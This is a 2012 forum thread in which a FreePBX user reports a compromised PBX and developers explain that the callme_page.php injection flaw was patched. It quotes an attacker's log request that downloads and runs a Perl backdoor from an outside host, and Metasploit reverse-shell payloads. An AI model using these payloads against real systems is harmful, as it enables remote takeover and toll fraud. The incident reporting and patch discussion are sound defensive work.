New FreePBX vulnerability?

francesco_r · March 27, 2012, 9:35am

Yesterday, after only a few hours that my company installed a new FreePBX system, the customer PBX was attacked and the system compromised. In the night were made hundreds of phone calls to Africa and Central America.
The system is Ubuntu 10.04 LTS with FreePBX 2.8/Asterisk 1.8.10.1 with all packages updated. And the passwords are 12 characters lenght with variable complexity.

Analizing the apache log i see this connection from Russia:

195.135.235.130 - - [27/Mar/2012:03:52:06 +0200] “GET /recordings/misc/callme_page.php?action=c&callmenum=*98@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://analoghost.jp/mt/.stuff/back.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%20inspiran.be%201234%0D%0A%0D%0Ace HTTP/1.1” 200 1087 “-” “Mozilla/5.0 (X11; Ubun
tu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0”

Google tell me this exploit:

http://packetstormsecurity.org/files/111174/freepbx_callmenum.rb.txt

github.com/rapid7/metasploit-framework

Freepbx exploit by muts

rapid7:master ← wchen-r7:freepbx_exploit

opened 12:49PM - 23 Mar 12 UTC

wchen-r7

+206 -0

This is a submission by muts. The original exploit sends a request like this (p…cap): Request sent by the original module: GET /recordings/misc/callme_page.php?action=c&callmenum=0@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.0.1.3%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0 Host: 10.0.1.2 The modified version is programmed to allow the extension option as a range, and sends each request like this: Request sent by the modified module: GET /recordings/misc/callme_page.php?action=c&callmenum=0@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.0.1.3%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0 Host: 10.0.1.2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) All modifications were suggested by HD.

Can someone tell me if this a new vulnerability?
What can i do to avoid this in future?
Thank you
Francesco

plindheimer · March 27, 2012, 1:33pm

This exploit should be fixed if all modules are up-to-date on versions 2.6 and above.

Btw … 2.8 is out of support, but the vulnerability was still fixed on it.

francesco_r · March 27, 2012, 1:54pm

You say that this vulnerability was solved in 2.6 but this page (http://packetstormsecurity.org/files/111174/freepbx_callmenum.rb.txt)
published yesterday say clearly: “This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the ‘callmenum’ parameter, it is possible to inject code to the ‘$channel’ variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs”

tonyclewis · March 27, 2012, 2:36pm

Do you have all your modules updated. We just published all these fixes last Friday from 2.6 and up.

plindheimer · March 27, 2012, 3:43pm

francesco_r

the report is not up-to-date with the fact that it has been fixed.

It requires the vulnerability to be passed in as a parameter. That parameter is no longer used. The only parameter that is now passed in is the action whether to initiate a call or hangup an existing call. The extension in question is obtained from the SESSION and the actual number to call is pulled directly from the AstDB which is setup for the user.

plindheimer · March 27, 2012, 4:13pm

francesco_r

as a side comment, the same concept could be exploited by an authenticated user if they input a bogus callme number into the GUI, or is otherwise someone managed to inject that into the AstDB variable.

The above has not been done or reported anywhere but was the second phase of addressing the potential exploit that we started going over right after immediately closing down the known and more dangerous issue.

It has been fixed per #5729 though so it is now both properly validated and properly checked to be a valid number when being used regardless of how it got into the AstDB.